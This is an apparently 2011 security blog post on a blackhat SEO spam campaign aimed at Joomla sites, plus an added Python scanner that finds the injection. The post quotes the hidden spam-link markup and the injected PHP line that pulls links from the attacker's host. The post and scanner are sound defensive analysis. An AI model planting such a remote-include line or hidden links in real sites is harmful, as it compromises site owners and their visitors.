The Latest in IT Security

Blackhat SPAM SEO From Joomlapoject.net – Targeting Joomla

15 Jun 2011

We are tracking another Blackhat SEO SPAM network being managed by http://joomlapoject.net. By the name of the domain, you can guess that they are targeting Joomla sites.

When you visit a compromised site, you don’t see anything wrong, but if you view the source, there is a large block of spammy links hidden in there:

<span style="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px">
<a href="http://www.nigeriavillagesquare.com/t3-assets/css/index.php">ACD Systems Canvas 11 with GIS Plus</a><br><a href="http://www.nigeriavillagesquar.. hundreds more links.

All those links are generated by http://joomlapoject.net/component.php (or global.php), which gets called on the Joomla site by the following code added to the template's index.php:

<?php readfile("http://joomlapoject.net/component.php");

If you have a Joomla site, make sure it is updated. You can check whether it has been compromised with this crud by viewing the source of your site, or by scanning it here: Sucuri SiteCheck. If you see a warning about SEO SPAM on our scanner, you know your site is hacked.
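The two manual checks described above can be scripted, shown here as an added example that is not from the original post or from Sucuri: `scan_templates` flags PHP files that fetch a literal http(s) URL, as the injected readfile line does, and `hidden_link_counts` counts links inside invisible span/div blocks in page source. The function names, the regex heuristics and the sample data in `demo()` are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that pull in content, called with a literal http(s) URL.
REMOTE_CALL = re.compile(
    r"\b(readfile|file_get_contents|fopen|include(?:_once)?|require(?:_once)?)\b"
    r"\s*\(?\s*[\"'](https?://[^\"'\s)]+)", re.IGNORECASE)
# A span/div styled to be invisible, like the hidden link block in the page source.
HIDDEN_BLOCK = re.compile(
    r"<(span|div)\b[^>]*style\s*=\s*[\"'][^\"']*"
    r"(?:visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>(.*?)</\1>", re.I | re.DOTALL)

def scan_templates(root):
    """Return (relative path, line number, function, url) per remote fetch in *.php files."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        lines = path.read_text(errors="replace").splitlines()
        for number, line in enumerate(lines, 1):
            for m in REMOTE_CALL.finditer(line):
                rel = path.relative_to(root).as_posix()
                hits.append((rel, number, m.group(1).lower(), m.group(2)))
    return hits

def hidden_link_counts(html):
    """Return the number of <a href> links inside each hidden span/div that has any."""
    counts = [len(re.findall(r"<a\s[^>]*href", m.group(2), re.I))
              for m in HIDDEN_BLOCK.finditer(html)]
    return [c for c in counts if c]

def demo():
    """Run both checks on constructed sample data (not taken from a real site)."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = Path(tmp, "templates", "example")
        tpl.mkdir(parents=True)
        (tpl / "index.php").write_text(
            '<?php defined("_JEXEC") or die; ?>\n<html><body>\n'
            '<?php readfile("http://joomlapoject.net/component.php"); ?>\n</body></html>\n')
        (tpl / "error.php").write_text('<?php include "local_header.php"; ?>\n')
        files = scan_templates(tmp)
    html = ('<span style="visibility: hidden; position: absolute; left: 0px">'
            '<a href="http://spam.example/a">x</a><br><a href="http://spam.example/b">y</a></span>'
            '<span style="color: red"><a href="/home">Home</a></span>')
    return files, hidden_link_counts(html)

if __name__ == "__main__":
    print(demo())
```

Both checks are heuristics: a hit in `scan_templates` needs manual review, since some extensions fetch remote content legitimately, and an obfuscated or concatenated URL will not match the literal-URL pattern.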

What’s interesting is that if you search for joomlapoject.net on Google, you will find thousands of sites that show up because of this warning:

“Warning: readfile(http://joomlapoject.net/component.php)” failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or .

Which probably happened when the joomlapoject site was down, causing all those errors.
